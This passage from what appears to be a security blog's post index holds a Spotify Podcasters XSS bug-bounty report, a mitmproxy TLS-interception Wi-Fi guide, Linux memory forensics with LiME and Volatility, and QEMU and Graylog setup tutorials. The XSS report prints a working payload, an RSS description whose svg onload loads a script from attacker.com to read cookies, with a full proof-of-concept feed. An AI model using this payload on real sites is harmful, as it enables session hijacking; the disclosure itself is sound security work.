of verification (excluding TLS-ALPN-01): HTTP-01 and DNS-01. If you\u0026rsquo;re like me with an ISP that uses a heavily NATed network then you can\u0026rsquo;t really use the first option. So I\u0026rsquo;ll be using second option which requires a domain name.\nDownload and install certbot with:\nsudo apt-get install certbot Run certbot with DNS as the preferred challenge:\ncertbot --manual --preferred-challenges dns certonly -d \u0026#39;*.example.com\u0026#39; I\u0026rsquo;d recommend you to obtain a wildcard certificate instead of a single subdomain certificate. This way you don\u0026rsquo;t need to reveal your Bitwarden server to the world, since there\u0026rsquo;s a public record of every Let\u0026rsquo;s Encrypt registered certificate.\nStarting and Stopping We will be using docker-compose along with the docker-compose.yml file to start and stop containers.\nTo start your set-up, type (-d makes it run in the background):\ndocker-compose up -d To stop the containers, type:\ndocker-compose down Thanks Bitwarden for creating an awesome password management solution.\nDani Carcia for creating a port of Bitwarden.\nLet\u0026rsquo;s Encrypt for free certificates for everyone.\n","permalink":"https://markuta.com/bitwarden-and-nginx-server-on-raspberry-pi/","title":"Bitwarden and Nginx Server on Raspberry Pi"},{"categories":null,"contents":"Its been a while since I posted. This is a quick update of the new changes. I\u0026rsquo;m now using a new Jekyll theme called klisé by Mahendrata Harpi. With this change, I\u0026rsquo;ll also try to post more regularly since my last post was back in 2019.\nI have also added my public key which is available here.\n","permalink":"https://markuta.com/changed-jekyll-theme/","title":"Changed Jekyll Theme"},{"categories":null,"contents":"In this blog post I\u0026rsquo;ll share a report I wrote a few months ago for a XSS bug found on podcasters.spotify.com. This was submitted on HackerOne but unfortunately, it was already reported and mine was considered a duplicate, oh well, better luck next time.\nSummary When a user submits a new podcast RSS feed for verification, the description tag inside it is not properly escaped. This results in JavaScript being executed on the page which could allow attackers to hijack users\u0026rsquo; session cookies and/or take over accounts.\nImpact When a user submits a malicious or compromised podcast RSS feed, attackers would be able to hijack the user\u0026rsquo;s account.\nSteps To Reproduce Start by navigating to: https://podcasters.spotify.com/submit Click on \u0026ldquo;Get Started\u0026rdquo; button Submit a malicious RSS feed link (proof of concept provided) The page renders whatever is in \u0026lt;description\u0026gt;\u0026lt;/description\u0026gt; The proof of concept simply shows the logged-in user\u0026rsquo;s cookie in the web browser. I\u0026rsquo;ve provided a link to my custom podcast RSS feed: https://attacker.com/feed.xml. The feed.xml attachment contains HTML which includes a x.js Javascript which alerts the user\u0026rsquo;s cookie. This was tested to check whether it was possible to get around Content-Security-Policy, and it is.\nSample of feed.xml (view attachment):\n----[CUT]---- \u0026lt;description\u0026gt; \u0026lt;![CDATA[\u0026lt;svg/onload=body.appendChild(document.createElement`script`).src=\u0026#39;https://attacker.com/x.js\u0026#39; hidden/\u0026gt;]]\u0026gt; \u0026lt;/description\u0026gt; ----[CUT]---- And x.js simply contains:\nalert(document.cookie) Proof of Concept feed.xml\n\u0026lt;rss version=\u0026#34;2.0\u0026#34; xmlns:itunes=\u0026#34;http://www.itunes.com/dtds/podcast-1.0.dtd\u0026#34; xmlns:googleplay=\u0026#34;http://www.google.com/schemas/play-podcasts/1.0\u0026#34; xmlns:atom=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:media=\u0026#34;http://search.yahoo.com/mrss/\u0026#34; xmlns:content=\u0026#34;http://purl.org/rss/1.0/modules/content/\u0026#34;\u0026gt; \u0026lt;channel\u0026gt; \u0026lt;atom:link href=\u0026#34;https://attacker.com/feed.xml\u0026#34; rel=\u0026#34;self\u0026#34; type=\u0026#34;application/rss+xml\u0026#34;/\u0026gt; \u0026lt;title\u0026gt;REKITTO\u0026lt;/title\u0026gt; \u0026lt;link\u0026gt;https://attacker.com/feed.xml\u0026lt;/link\u0026gt; \u0026lt;language\u0026gt;en-gb\u0026lt;/language\u0026gt; \u0026lt;description\u0026gt;\u0026lt;![CDATA[\u0026lt;svg/onload=body.appendChild(document.createElement`script`).src=\u0026#39;https://attacker.com/x.js\u0026#39; hidden/\u0026gt;]]\u0026gt;\u0026lt;/description\u0026gt; \u0026lt;image\u0026gt; \u0026lt;url\u0026gt;https://attacker.com/serial-itunes-logo.png\u0026lt;/url\u0026gt; \u0026lt;title\u0026gt;XYZ\u0026lt;/title\u0026gt; \u0026lt;link\u0026gt;https://attacker.com/\u0026lt;/link\u0026gt; \u0026lt;/image\u0026gt; \u0026lt;itunes:explicit\u0026gt;no\u0026lt;/itunes:explicit\u0026gt; \u0026lt;itunes:type\u0026gt;episodic\u0026lt;/itunes:type\u0026gt; \u0026lt;itunes:subtitle\u0026gt;True stories from the dark side of the Internet\u0026lt;/itunes:subtitle\u0026gt; \u0026lt;itunes:author\u0026gt;Tester\u0026lt;/itunes:author\u0026gt; \u0026lt;itunes:summary\u0026gt;Summary text here.\u0026lt;/itunes:summary\u0026gt; \u0026lt;itunes:owner\u0026gt; \u0026lt;itunes:name\u0026gt;Tester\u0026lt;/itunes:name\u0026gt; \u0026lt;itunes:email\u0026gt;user@example.com\u0026lt;/itunes:email\u0026gt; \u0026lt;/itunes:owner\u0026gt; \u0026lt;itunes:image href=\u0026#34;https://attacker.com/serial-itunes-logo.png\u0026#34;/\u0026gt; \u0026lt;itunes:category text=\u0026#34;Technology\u0026#34;\u0026gt; \u0026lt;/itunes:category\u0026gt; \u0026lt;item\u0026gt; \u0026lt;title\u0026gt;Streaming: The Example Show\u0026lt;/title\u0026gt; \u0026lt;description\u0026gt;Some text here.\u0026lt;/description\u0026gt; \u0026lt;pubDate\u0026gt;Sat, 23 May 2020 03:29:15 -0000\u0026lt;/pubDate\u0026gt; \u0026lt;itunes:title\u0026gt;Testing\u0026lt;/itunes:title\u0026gt; \u0026lt;itunes:episodeType\u0026gt;trailer\u0026lt;/itunes:episodeType\u0026gt; \u0026lt;itunes:keywords\u0026gt;\u0026lt;![CDATA[\u0026lt;p\u0026gt;More Text\u0026lt;/p\u0026gt;]]\u0026gt;\u0026lt;/itunes:keywords\u0026gt; \u0026lt;itunes:author\u0026gt;Tester\u0026lt;/itunes:author\u0026gt; \u0026lt;itunes:image href=\u0026#34;https://attacker.com/serial-itunes-logo.png\u0026#34;/\u0026gt; \u0026lt;itunes:subtitle\u0026gt;Streaming: The Example Show\u0026lt;/itunes:subtitle\u0026gt; \u0026lt;itunes:summary\u0026gt;Another summary :)\u0026lt;/itunes:summary\u0026gt; \u0026lt;content:encoded\u0026gt; \u0026lt;![CDATA[\u0026lt;p\u0026gt;Even more encoded text\u0026lt;/p\u0026gt;]]\u0026gt; \u0026lt;/content:encoded\u0026gt; \u0026lt;itunes:duration\u0026gt;6\u0026lt;/itunes:duration\u0026gt; \u0026lt;itunes:explicit\u0026gt;no\u0026lt;/itunes:explicit\u0026gt; \u0026lt;guid isPermaLink=\u0026#34;false\u0026#34;\u0026gt;\u0026lt;![CDATA[dd10738e-9efg-11ea-bb2d-cf99e05d892b]]\u0026gt;\u0026lt;/guid\u0026gt; \u0026lt;enclosure url=\u0026#34;https://attacker.com/sample.mp3\u0026#34; length=\u0026#34;6\u0026#34; type=\u0026#34;audio/mpeg\u0026#34;/\u0026gt; \u0026lt;/item\u0026gt; \u0026lt;/channel\u0026gt; \u0026lt;/rss\u0026gt; ","permalink":"https://markuta.com/xss-on-spotify-podcasters/","title":"A XSS bug on Spotify's Podcasters"},{"categories":null,"contents":"Overview In this guide we\u0026rsquo;ll be going through the process of configuring an intercepting set-up using mitmproxy and a wireless network, to inspect, modify and monitor encrypted HTTPS traffic. This will allow for a simple way to analyse traffic on mobile handsets and IoT devices, with the only requirements is Wi-Fi support and the ability to install custom certificates.\nmitmproxy is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. read more\nA simple illustration of mitmproxy running in transparent mode under Debian Buster:\nThe communication process:\niPhone \u0026lt;==\u0026gt; Wi-Fi TAP \u0026lt;==\u0026gt; mitmproxy \u0026lt;== (IP Forwarding) \u0026lt;==\u0026gt; Internet Requirements Software There are several software packages required for this set-up. All of which can be downloaded through apt-get on most Linux based systems. As mentioned previously I\u0026rsquo;ll be using Debian Stretch, but the guide can be applied to other systems.\nList of required packages:\nmitmpoxy – a HTTP traffic interception tool. dnsmasq - a lightweight DNS forwarder and DHCP service. hostapd – a utility used for creating the wireless access point. tcpdump – an all-round great packet capture utility. To install all of the above:\nsudo apt update sudo apt install mitmproxy hostapd dnsmasq tcpdump Hardware And for hardware, the only requirement is having two network interface cards, one for providing Internet connectivity and the other for broadcasting the wireless access point. I\u0026rsquo;ll be using one I bought from Amazon a (TP-Link Archer T2U Nano AC600) which is cheap and supports 2.4GHz and 5GHz natively on Linux systems, and my MacBook Pro\u0026rsquo;s built-in wireless card.\nDrivers The TP-Link Archer T2U Nano AC600 WiFi adapter requires additional effort while installing on Linux. The only driver that worked was realtek-rtl88xxau-dkms version 5.2.20.2~20190617 available on here.\ngit clone https://gitlab.com/kalilinux/packages/realtek-rtl88xxau-dkms cd realtek-rtl88xxau-dkms sudo ./dkms-install.sh To check if the driver installed properly, plug in your USB adapter and ensure pass-through is enabled within the virtualization software. In my case, VMware Fusion (Menu \u0026gt; Virtual Machine \u0026gt; USB \u0026amp; Bluetooth).\nRun the following inside the virtual machine ip a:\nThere should be two network interface cards, one called ens33 which will provide access to the Internet, and the other interface we just created called wlxd037XXXXXXXX will be configured as our wireless access point to use with mitmproxy.\nConfigure Networking Ensure the newly created network interface has a static IP address and a gateway address. This will point to the Dnsmasq service in the step next. Use the following network configuration and replace network interfaces to suite your own. A reboot may be required.\nNetwork configuration file: /etc/network/interfaces\n# This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). source /etc/network/interfaces.d/* # The loopback network interface auto lo iface lo inet loopback # The primary network interface allow-hotplug ens33 iface ens33 inet dhcp # The secondary network interface allow-hotplug wlxd037XXXXXXXX iface wlxd037XXXXXXXX inet static address 10.0.0.254/24 netmask 255.255.255.0 gateway 10.0.0.254 IP Forwarding and IPtables Start by enabling IP forwarding and add masquerade rules with IPtables to route and redirect specific network traffic to mitmproxy. This will be persistent.\nEdit the main system config: /etc/sysctl.conf and uncomment this line:\nnet.ipv4.ip_forward=1 Apply the following rules to IPTables (replace to suit your wireless interface):\nsudo iptables -t nat -A PREROUTING -i wlxd037XXXXXXXX -p tcp --dport 80 -j REDIRECT --to-port 8080 sudo iptables -t nat -A PREROUTING -i wlxd037XXXXXXXX -p tcp --dport 443 -j REDIRECT --to-port 8080 Dnsmasq To make devices have their own IP addresses assigned automatically, a DHCP server is required. Dnsmasq is a lightweight DNS forwarder and DHCP server suitable for small networks. This makes sense otherwise we would need to manually assign addresses.\nCreate and modify the configuration file: /etc/dnsmasq.conf and replace it with:\n# Wireless Interception Interface interface=wlxd037XXXXXXXX # DHCP server and range for assigning IP addresses dhcp-range=10.0.0.1,10.0.0.100,96h # Broadcast gateway and DNS server information dhcp-option=option:router,10.0.0.254 dhcp-option=option:dns-server,10.0.0.254 Hostapd And finally, create the wireless network with Hostapd. This wireless network will operate under the 2.4GHz frequency (channel 7) and will be able to forward traffic onto the primary interface.\nCreate a new configuration file: /etc/hostapd/hostapd.conf\ninterface=wlxd037XXXXXXXX driver=nl80211 ssid=TAP hw_mode=g channel=7 ht_capab=[HT40][SHORT-GI-20] wmm_enabled=0 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=gimme_the_loot wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP To use the 5GHz band with TP-Link adapter the Hostapd configuration file needs to be changed and driver needs to be loaded with:\nmodprobe -r 88XXau \u0026amp;\u0026amp; modprobe 88XXau rtw_vht_enable=2 mitmproxy Saving TLS master keys to a file while running mitmproxy. With this file Wireshark is able to decrypt TLS traffic. See the Wireshark wiki for more information. Modify your .bashrc file and export the environment variable:\nexport SSLKEYLOGFILE=\u0026#34;$HOME/sslkeylogfile.txt\u0026#34; tcpdump When you want to capture all network traffic from an interface and you do not want to intercept or modify the flow. You need to flush the previous IPTables rules and apply a new rule.\nTo flush all IPTable rules within the nat table:\nsudo iptables -t nat -F And add a new rule to masquerade traffic to the Internet interface:\nsudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE After that you can run a tcpdump packet capture:\nsudo tcpdump -i \u0026lt;interface\u0026gt; -s 65535 -w \u0026lt;file\u0026gt; Launching First, start the DNSmasq server:\nsudo systemctl start dnsmasq Next, start the Hostapd service:\nsudo systemctl start hostapd Finally, start the mitmproxy for example in transparent mode:\nmitmproxy --mode transparent --showhost iPhone Here is an example of monitoring traffic using an iPhone device. First, connect to the wireless network created by Hostapd as you would to a regular Wi-Fi network.\nThen, open a browser and navigate to http://mitm.it (make sure mitmproxy is running). Download the certificate for your device type and hit allow.\nNext, go to Settings \u0026gt; General \u0026gt; Profile \u0026gt; mitmproxy \u0026gt; Install Profile. When installed, go back to the main Settings again General \u0026gt; About \u0026gt; Certificate Trust Settings and enable full trust for root certificate.\nFixes There appears to be an issue with mitmproxy packages on Debian (Stretch and Buster). When visiting the http://mitm.it/ to download certificates, the page does not display the links properly. Leaving the user to manually browse site on devices.\nhttp://mitm.it/cert/pem – Android \u0026amp; iOS http://mitm.it/cert/p12 – Windows Or find and edit the file /usr/lib/python3/dist-packages/mitmproxy/addons/onboardingapp/templates/layouts.html and replace:\n\u0026lt;link href=\u0026#34;/static/bootstrap.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; \u0026lt;link href=\u0026#34;/static/font-awesome.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; With:\n\u0026lt;link href=\u0026#34;//stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; \u0026lt;link href=\u0026#34;//stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; Resources A list of useful resources:\nHow to use Transparent mode in VMs Running a Man-in-the-middle proxy on a Raspberry pi 3 Raspberry Pi as Wireless Access Point Four ways to Bypass Certificate Pinning on Android Bypass SSL Pinning Android ","permalink":"https://markuta.com/tp-link-archer-t2u-nano-for-tls-traffic-interception/","title":"TP-Link Archer T2U Nano for TLS Traffic Interception"},{"categories":null,"contents":"In this blog post I\u0026rsquo;ll be demonstrating a process of obtaining or acquiring a memory image from a running Linux system. The tool of choice LiME (Linux Memory Extractor) and is available on Github.\nAfter a forensic image has been acquired we will use Volatility with a custom Linux profile for the analysis, to keep things simple I\u0026rsquo;ve used the latest Debian Stretch kernel version 4.9.0-8-amd64 as the target system so it\u0026rsquo;s easily repeatable.\nBuilding LiME Kernel Module LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. read more\nTo use the Kernel module it must be built for that specific Kernel version, otherwise insmod will not be able to load it. There are also times when targets may use non-standard Kernels i.e. Grsecurity or completely custom ones.\nIdeally the following should be done on a forensics workstation. But there are times when it may be necessary to compile and load the module directly on a target system, an example would be when a custom Linux Kernel is present.\nPrerequisites sudo apt install linux-headers-4.9.0-8-amd64 sudo apt install build-essential Download LiME git clone https://github.com/504ensicsLabs/LiME Compile cd LiME/src/ make You\u0026rsquo;ll notice a file being created named lime-4.9.0-8-amd64.ko this is our LKM.\nMemory Acquisition With LiME you have the option to either write to disk or transfer over the network. The latter may pose issues with firewalls or high network usage environments. Nevertheless, the option is there, for our purposes we will be writing to a disk. In a real world scenario you\u0026rsquo;d be writing to some form of external media.\nWrite to disk The following uses insmod to load our compiled Loadable Kernel Module. The options format=lime and timeout=0 are important for Volatility. Testing revealed there are a few issues with type raw.\nsudo insmod lime-4.9.0-8-amd64.ko \u0026#34;path=/media/external/dump.mem format=lime timeout=0\u0026#34; Write over the network Similar to the above we start a listening session on a port 4444 using tcp:port:\nsudo insmod lime-4.9.0-8-amd64.ko \u0026#34;path=tcp:4444 format=lime timeout=0\u0026#34; On a remote host workstation we can use netcat to establish a connection and download the image:\nnc 10.10.1.10 4444 \u0026gt; dump.mem Cleaning up When complete to unload the Kernel Module simply type: sudo rmmod lime\nBuilding Linux Volatility Profile Building a Linux profile for Volatility requires a bit more effort. There are times when it may not work correctly. Many people have experienced issues with Linux Kernel versions 4.8+ due to the way Kernel address space layout randomization (KASLR) works.\nAs mentioned above in this blog post we\u0026rsquo;ll be building a Linux profile for Debian Stretch system with the Kernel Version: 4.9.0-8-amd64 (2018-08-21) which is confirmed working with Volatility.\nDownload Volatility git clone https://github.com/volatilityfoundation/volatility Install Dependencies sudo apt install dwarfdump pcregrep libpcre++-dev python-dev python-pip Install Python Modules pip install pycrypto Distorm3 OpenPyxl ujson Building a Profile Navigate to volatility/tools/linux and type the following:\nsudo make -C /lib/modules/$(uname -r)/build CONFIG_DEBUG_INFO=y M=$PWD modules dwarfdump -di ./module.o \u0026gt; module.dwarf sudo zip Debian4908.zip module.dwarf /boot/System.map-$(uname -r) Move or copy the created zip file to the following directory within Volatility:\ncp Debian4908.zip ../../plugins/overlays/linux/ Now when running --info we should see our newly created Linux Profile(s) LinuxDebian4908x64 as available. The archive we created will be prepended with Linux and appended with x64 dependent on the architecture type.\nMemory Analysis with Volatility Now comes the fun part. Once everything is set up correctly and we\u0026rsquo;ve acquired a forensic image using LiME. We can start our analysis with Volatility.\nAn example command using options -f memory file, --profile profile name and linux_banner plugin would look something like this:\npython vol.py -f debian-latest.lime --profile=LinuxDebian4908x64 linux_banner Tested Plugins The following is a list of working plugins under our profile.\nlinux_arp - Print the ARP table linux_aslr_shift - Automatically detect the Linux ASLR shift linux_banner - Prints the Linux banner information linux_bash - Recover bash history from bash process memory linux_bash_env - Recover a process\u0026#39; dynamic environment variables linux_bash_hash - Recover bash hash table from bash process memory linux_check_fop - Check file operation structures for rootkit modifications linux_check_idt - Checks if the IDT has been altered linux_check_modules - Compares module list to sysfs info, if available linux_check_tty - Checks tty devices for hooks linux_cpuinfo - Prints info about each active processor linux_dmesg - Gather dmesg buffer linux_dump_map - Writes selected memory mappings to disk linux_dynamic_env - Recover a process\u0026#39; dynamic environment variables linux_elfs - Find ELF binaries in process mappings linux_enumerate_files - Lists files referenced by the filesystem cache linux_find_file - Lists and recovers files from memory linux_getcwd - Lists current working directory of each process linux_hidden_modules - Carves memory to find hidden kernel modules linux_ifconfig - Gathers active interfaces linux_info_regs - It\u0026#39;s like \u0026#39;info registers\u0026#39; in GDB. It prints out all the linux_iomem - Provides output similar to /proc/iomem linux_kaslr_shift - Automatically detect KASLR physical/virtual shifts and alternate DTBs linux_kernel_opened_files - Lists files that are opened from within the kernel linux_keyboard_notifiers - Parses the keyboard notifier call chain linux_ldrmodules - Compares the output of proc maps with the list of libraries from libdl linux_library_list - Lists libraries loaded into a process linux_librarydump - Dumps shared libraries in process memory to disk linux_list_raw - List applications with promiscuous sockets linux_lsmod - Gather loaded kernel modules linux_lsof - Lists file descriptors and their path linux_malfind - Looks for suspicious process mappings linux_memmap - Dumps the memory map for linux tasks linux_moddump - Extract loaded kernel modules linux_mount - Gather mounted fs/devices linux_netfilter - Lists Netfilter hooks linux_netscan - Carves for network connection structures linux_netstat - Lists open sockets linux_pidhashtable - Enumerates processes through the PID hash table linux_pkt_queues - Writes per-process packet queues out to disk linux_plthook - Scan ELF binaries\u0026#39; PLT for hooks to non-NEEDED images linux_proc_maps - Gathers process memory maps linux_proc_maps_rb - Gathers process maps for linux through the mappings red-black tree linux_procdump - Dumps a process\u0026#39;s executable image to disk linux_process_hollow - Checks for signs of process hollowing linux_psaux - Gathers processes along with full command line and start time linux_psenv - Gathers processes along with their static environment variables linux_pslist - Gather active tasks by walking the task_struct-\u0026gt;task list linux_psscan - Scan physical memory for processes linux_pstree - Shows the parent/child relationship between processes linux_strings - Match physical offsets to virtual addresses (may take a while, VERY verbose) linux_threads - Prints threads of processes linux_tmpfs - Recovers tmpfs filesystems from memory linux_volshell - Shell in the memory image Example Output Cavets There may be issues with targets with unique kernel versions or those that utilize additional SDK. Not to mention further issues with KASLR on newer Linux Kernels.\nReading Material Linux Memory Extractor Documentation Volatility Wiki KASLR and Volatility ","permalink":"https://markuta.com/live-memory-acquisition-on-linux-systems/","title":"Live Memory Acquisition on Linux Systems"},{"categories":null,"contents":"Update (2021) Debian ended support MIPS big endian, as a result some links became broken. I have updated the link and you can still follow this tutorial for MIPS little endian..\nHow to set up and build your own MIPS big endian or little endian image running under the QEMU emulator. This guide can also be applied to other architectures. For example I\u0026rsquo;m currently running this in a virtual machine inside another virtual machine on my MacBook Pro. \u0026ldquo;We Need To Go Deeper\u0026rdquo; - Dom Cobb, Inception.\nInstall Package Since we are only emulating a MIPS system on QEMU, we only require a specific package namely; qemu-system-mips. On most Linux distos you can simply install through apt-get. This will also install further packages required by QEMU:\n$ sudo apt-get install qemu-system-mips The exact version used: QEMU emulator version 2.8.1(Debian 1:2.8+dfsg-6+deb9u3).\nDownload files There are two versions of the MIPS-32 (Big Endian Little Endian); Malta and Octeon. This guide will be using the Malta version. Although it\u0026rsquo;s almost the exact same process for Octeon with a few minor option differences. I have updated the links below to reflect the changes.\nThe Kernel filename may differ to one listed below. As the Debian team provides newer releases and updates, the filename will change over time. Link to Latest Stable.\nDownload both the installer and boot files from stable release:\nInstaller (initrd.gz) ~21MB: $ wget https://ftp.debian.org/debian/dists/stable/main/installer-mipsel/current/images/malta/netboot/initrd.gz Kernel boot (vmlinuz-5.10.0-8-4kc-malta) ~11MB: $ wget https://ftp.debian.org/debian/dists/stable/main/installer-mipsel/current/images/malta/netboot/vmlinuz-5.10.0-8-4kc-malta\tOptional: Verify downloaded files with SHA256SUMS by manually comparing the hash values: $ shasum -a 256 initrd.gz vmlinuz-5.10.0-8-4kc-malta\t15376785c6146daf17b225e475b15c329e274e9cd91df3300d96dcf5aa334158 initrd.gz c0e7e76ce2c12451ef63e5dfecdd577c3de84ef013f643e5addc01d7d79e6a45 vmlinuz-5.10.0-8-4kc-malta\tCreate an QEMU image file Create an QEMU image file specifying its storage size and filetype to be used as installation media. The table below shows the minimal hardware requirements as per Debian official documentation: Link\nInstall Type | Minimum (RAM) | Recommended (RAM) | Storage No Desktop | 128MB | 512MB | 2GB Desktop | 256MB | 1GB | 10GB\nCreate an qcow2 format image with 2G of storage:\n$ qemu-img create -f qcow2 hda.img 2G Install Debian MIPS Before starting make sure all three files (hda.img, vmlinux-4.9.0-6-4kc-malta and initrd.gz) are actually in the current working directory. The installation process is almost identical to the standard x86_64 or i386 architectures.\nTo start the installation type:\n$ qemu-system-mips -M malta \\ -m 256 -hda hda.img \\ -kernel vmlinux-4.9.0-6-4kc-malta \\ -initrd initrd.gz \\ -append \u0026#34;console=ttyS0 nokaslr\u0026#34; \\ -nographic By default QEMU enables a NATed network interface for Internet connectivity through the hosts network. This allows the virtual machine to install and update packages.\nInstall SSH server I highly recommend installing a SSH server so you can communicate with the host machine for uploading and downloading files whilst in a NATed network. The writer has yet to explore network bridging and other network connectivity. This will probably be the next post.\nInstallation Completed Once you see this screen your installation has completed and it\u0026rsquo;s time to shutdown. Unfortunately, if you hit continue qemu will reboot right back into the installer. Therefore you\u0026rsquo;d either want to kill process or enter cli shell by selecting Go Back \u0026gt; Go Down \u0026gt; Execute Shell and type command poweroff that will shutdown the virtual machine.\nCopy over Kernel initrd.img file During the installation stage you\u0026rsquo;ll see this screen warning us that no bootloader has been installed.\nBefore you can use the freshly installed MIPS image you first need to extract the Kernel initrd.img-[version] file found in the /boot partition of the image. We must manually copy it by mounting the image and executing a few commands.\nMount the boot partition of the image file: sudo modprobe nbd max_part=63 sudo qemu-nbd -c /dev/nbd0 hda.img sudo mount /dev/nbd0p1 /mnt Copy a single file or the entire folder to the current directory: cp -r /mnt/boot/initrd.img-4.9.0-6-4kc-malta . # copy only initrd.img file cp -r /mnt/boot . # copy the entire boot folder Unmount the image: sudo umount /mnt sudo qemu-nbd -d /dev/nbd0 Running the QEMU image Now that all the files have been configured and set up. It\u0026rsquo;s time to officially start the virtual machine. The following set of options can be changed to your liking. You could also make the following into a Bash script.\nTo start the image type:\n$ qemu-system-mips -M malta \\ -m 256 -hda hda.img \\ -kernel vmlinux-4.9.0-6-4kc-malta \\ -initrd initrd.img-4.9.0-6-4kc-malta \\ -append \u0026#34;root=/dev/sda1 console=ttyS0 nokaslr\u0026#34; \\ -nographic \\ -device e1000-82545em,netdev=user.0 \\ -netdev user,id=user.0,hostfwd=tcp::5555-:22 The last option enables port forwarding on host machine port 5555 to the guest machine on port 22 for ssh communication.\nTo access the guest machine from Host machine to upload a file:\n$ scp -P 5555 file.txt root@localhost:/tmp Or to connect via ssh:\n$ ssh root@localhost -p 5555 The result Thanks A few other resources that were very helpful:\nQEMU - Debian Wiki Building a Debian Stretch QEMU image for MIPSel - Blah Cats Pre-configured Debian Squeeze and Wheezy images OpenWrt in QEMU - OpenWrt Wiki Debian on an emulated MIPS(EL) machine ","permalink":"https://markuta.com/how-to-build-a-mips-qemu-image-on-debian/","title":"How to build a Debian MIPS image on QEMU"},{"categories":null,"contents":"This guide shows you how to quickly set up and get started with Nzyme and Graylog version 2.3.2 using Docker. In this tutorial I\u0026rsquo;m using Mac OS but Docker can be install on any platform. For testing purposes, I\u0026rsquo;d recommend using Kali Linux or any Debian based distro on where Nzyme sensor is installed.\nWhat is it? Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog (Open Source log management) setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode. Way more information is available on wtf.horse and GitHub.\nIn a real world scenario users would want to use an additional WWAN or LTE network interface, for when a LAN isn\u0026rsquo;t reachable or unavailable. Below demonstrates a simple network diagram that has two devices running nyzme, both have a number of network interfaces for collecting wireless traffic and communicating back to the centralised server.\nThis is how I would picture a simple network architecture:\nOverview A review of necessary steps. This guide can be applied to any Operating System running Docker software.\nInstalling Docker and using a docker-compose.yml configuration file that contains defined services (Graylog, MongoDB, ElasticSearch), networks and volumes. Setting up a new GELF input through the Graylog web interface. Setting up and deploying a Nzyme sensor. Docker Docker provides containers and images that make it really easy to install and configure Graylog server. Mongo Database and ElasticSearch are both required by Graylog. Rather than installing by hand we could define them in our docker-compose.yml file. It\u0026rsquo;s also important to use the right software version, as Graylog is picky on what version is used. Without specifying the version, it\u0026rsquo;ll use the latest which in some cases isn\u0026rsquo;t a good idea.\nDownload and install docker: https://www.docker.com\nA quick note on software versions:\nMongoDB 3.0.15 ElasticSearch 5.5.2 Graylog 2.3.2 Network ports:\n514 - Syslog UDP/TCP 9000 - Graylog Web Interface 12201 - GELF TCP/UDP Docker-Compose file version: \u0026#39;2\u0026#39; services: # MongoDB: https://hub.docker.com/_/mongo/ mongo: image: mongo:3 # Persistent Logs volumes: - mongo_data:/data/db # Elasticsearch: https://www.elastic.co/guide/en/elasticsearch/reference/5.5/docker.html elasticsearch: image: docker.elastic.co/elasticsearch/elasticsearch:5.5.2 # Persistent Logs volumes: - es_data:/usr/share/elasticsearch/data environment: - http.host=0.0.0.0 # Disable X-Pack security: https://www.elastic.co/guide/en/elasticsearch/reference/5.5/security-settings.html#general-security-settings - xpack.security.enabled=false - \u0026#34;ES_JAVA_OPTS=-Xms512m -Xmx512m\u0026#34; ulimits: memlock: soft: -1 hard: -1 mem_limit: 1g # Graylog: https://hub.docker.com/r/graylog/graylog/ graylog: image: graylog/graylog:2.3.2-1 # Persistent Logs volumes: - graylog_journal:/usr/share/graylog/data/journal environment: # CHANGE ME! - GRAYLOG_PASSWORD_SECRET=somepasswordpepper # Password: admin - GRAYLOG_ROOT_PASSWORD_SHA2=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 - GRAYLOG_WEB_ENDPOINT_URI=http://127.0.0.1:9000/api links: - mongo - elasticsearch ports: # Graylog web interface and REST API - 9000:9000 # Syslog TCP - 514:514 # Syslog UDP - 514:514/udp # GELF TCP - 12201:12201 # GELF UDP - 12201:12201/udp # Volumes for persisting data, see https://docs.docker.com/engine/admin/volumes/volumes/ volumes: mongo_data: driver: local es_data: driver: local graylog_journal: driver: local Start container Simply save the above docker-compose.yml file to your Containers directory and type in a terminal: docker-compose up. This may take a bit of time as Docker downloads and installs the containers for the first time. Once completed on another tab you can check with: docker container list.\nGraylog Web Interface Once Docker has finishes loading up, you can access the Graylog Web Interface. By default the server listens on port 9000 which is accessible both through localhost address and your system\u0026rsquo;s LAN IP address.\nDefault Web Interface Username and Password: admin:admin\nTo add a new GELF input simply Navigate to: System \u0026gt; Inputs. As shown:\nAnd from the drop-down menu select GELF TCP and hit Launch new input. You\u0026rsquo;ll then be asked to enter a title. More options are available like enabling TLS for transmitting logs securely, however since this is a quick guide it won\u0026rsquo;t be required.\nConnection Test Before continuing it\u0026rsquo;s a good idea to test whether the newly created input is actually accepting our entries. To do this you could run netcat from a terminal:\necho -n -e \u0026#39;{ \u0026#34;version\u0026#34;: \u0026#34;1.1\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;markuta.com\u0026#34;, \u0026#34;short_message\u0026#34;: \u0026#34;A short message\u0026#34;, \u0026#34;level\u0026#34;: 5, \u0026#34;_some_info\u0026#34;: \u0026#34;foo\u0026#34; }\u0026#39;\u0026#34;\\0\u0026#34; | nc -w1 127.0.0.1 12201 There now should be a new entry in http://127.0.0.1:9000/sources.\nA more realistic approach would be doing the same test but from another computer on the same network, simply replace the IP address to your current system\u0026rsquo;s (where Docker is installed) address. Be sure to allow or disable firewall rules on TCP port 12201. As with Mac OS, the firewall will block incoming connections.\nNzyme Now that our centralised Graylog server is ready. It\u0026rsquo;s time to set up Nzyme. Nzyme runs on Java and thus requires a Java Runtime environment. Both the OpenJDK or the Oracle 